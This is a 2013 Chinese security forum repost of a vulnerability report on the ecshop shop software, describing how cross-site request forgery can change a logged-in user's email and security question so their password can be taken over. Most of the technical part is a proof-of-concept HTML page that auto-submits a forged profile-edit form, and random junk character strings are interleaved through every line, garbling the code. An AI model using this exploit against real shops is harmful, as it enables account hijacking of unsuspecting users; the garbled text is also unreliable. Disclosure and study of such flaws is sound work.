找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1804|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
2 Z5 ]: F2 A9 Iecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
6 X" p5 S+ |( b# G' Q8 |5 B1 t/ q
$ z' ~* `' n- n! oDemo For:http://www.wooyun.org/bug.php?action=view&id=395
7 E8 U$ [4 k& x8 V+ a
4 }1 f# q5 M$ P6 C( O详细说明:
; r2 r2 I& ]  X利用csrf和xss可以突破官方所说的“障碍”3 G8 u- d5 }4 {: W: N/ S
xss版本已经有人说明
- D; n. A1 p5 \. S0 r. }这里给出csrf版本
8 B: h) H% A9 T7 o& M/ o3 w5 U3 s! w3 `9 F8 u, J% o
漏洞证明:# a, ?3 |$ ]" J" N6 W  C: |& g
<html>$ s& O& X  L0 ~! W6 L
<body>
& E1 c  C, f8 w3 W<form action="http://www.wooyun.org/ecshop/user.php" method="POST">1 |8 N" y9 `; p0 n6 g" N5 J/ o
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">( c, r# \! `- y( V8 g& O# q- r
<INPUT TYPE="text" NAME="act" value="act_edit_profile">, m- e6 q6 @! X) R& L# b) ~
<INPUT TYPE="text" NAME="sel_question" value="ecshop">& |; h4 V3 e  e, Y7 z
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">$ o1 z% H  K! H) b2 A
</body>
9 E5 F& V" B+ r1 [, l2 L2 V<script>$ n) V2 ]5 ~3 O  Y9 Q! d# V
document.forms[0].submit();' C$ E; T1 M& u  O' q' y
</script>* M0 j. ]; T( z- e
</html>
! c! o; ^( O+ o( i- a$ ^构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失7 m5 B2 d1 ]4 U6 V8 C
7 U6 u1 \% U" {" b% C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表